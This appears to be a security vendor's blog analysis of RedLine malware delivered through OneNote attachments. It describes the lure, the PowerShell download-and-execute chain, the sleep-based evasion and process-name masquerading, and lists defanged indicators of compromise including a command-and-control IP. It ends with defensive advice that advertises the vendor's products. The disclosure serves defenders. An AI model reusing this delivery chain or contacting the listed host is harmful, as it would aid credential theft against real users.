Analysts at SecneurX have found that the Redline malware is abusing Microsoft’s OneNote to spread malware. OneNote is one of the highly popular components of the Microsoft 365 package which is still under support and recieving important software updates from Microsoft. However, the frequent beta testing of the product has resulted in hackers exploiting vulnerabilities for phishing-based malware attacks. Malicious actors are exploiting the frequent feature updates to OneNote by Microsoft by using double-clicks on spam emails, which automatically runs a script, installing malware from remote sites into the user’s computer.
Our Secneurx Analysts found in its lab one of the Redline malware which is using OneNote to spread malware that is performing few evading techniques, so that the Antivirus Software would not be able to flag it as malicious.
Screenshots of OneNote malware spoofing as legitimate document
After opening the OneNote through Microsoft OneNote, it prompts the user to click the "Review Documents" image.
After clicking the "Review Documents" image a Warning Message gets popped up displaying the message as “Opening attachments will harm your computer and data”
Behind the "Review Documents" image multiple link files are attached so threat actor tries to spoof the victim to click "Review Documents" image as the victim clicked the "Review Documents" image link file will be executed.
Performing Evading Techniques
Once the user clicked on OK button, the link file will run through powershell command and a Portable Executable (PE) file gets downloaded in the preferred location and gets executed automatically.
After executing the file, a powershell command is passed with base64 encryption
The Start-Sleep cmdlet in PowerShell is often used to introduce delays in a script or command to avoid detection by security software.
It downloads an executable file "Opgcxhsdw.exe" and it saves the downloaded file as svhost.exe by mimicking the legitimate process svchost.exe. After executing and performing all the functions of the malware, the data gets exfiltrated from the user PC's and is communicated with c2.
IOC DETAILS
DOMAINS
oiartzunirratia[.]eus
IP ADDRESSES
194[.]26[.]192[.]248
URL
hxxp[:]//194[.]26[.]192[.]248/
SHA256
bf8c7c35cb5b8f47ad7fe7e89322960e105efa754360953ca854925a6b914092
What can you do to avoid being a malware victim?
As dangerous as malware is, simply being aware and staying updated with the latest malware trends can go a long way in securing your data and systems. Here are helpful tips on how you can defend yourself from a likely attack.
Scrutinize emails & its attachments before opening them
Be wary of emails from unverified sources. You can check by communicating directly with the purported sender to confirm if they sent the messages. To check its validity, you can use SecneurX Sandbox to verify the sanity of the email.
Avoid clicking embedded links found in unverified emails
Such social engineering tricks can lead to the download of malware. Additionally, be wary of sites that prompt you to enter a CAPTCHA code as this could be linked to a malware attack. To check its validity, you can use services like SecneurX Sandbox to verify the reputation of the site.
Back up your important files
While prevention is always better than the cure, having a backup of important files can at least lessen the potential damage done by a malware attack. While being locked out of your own system is always a bad thing, at least it's not a total disaster since you can always retrieve your important files. The 3-2-1 backup rule applies here—three backup copies of your data on two different media, and one of those copies in a separate location.
Regularly update software, programs, applications
Updating them to the latest versions can provide an added layer of protection against online threats as some malware arrive via vulnerability exploits.
Use a layered protection suite
Doing so can detect threats before they enter your network. Security solutions like SecneurX ATP can block Infectious files (like executables (.exe, .run, etc.), archives (ZIP, RAR, etc.), Microsoft Office and PDF documents, JavaScript, and so on) by scanning them at the point of entry of the organizations (File uploads, USB file transfers etc)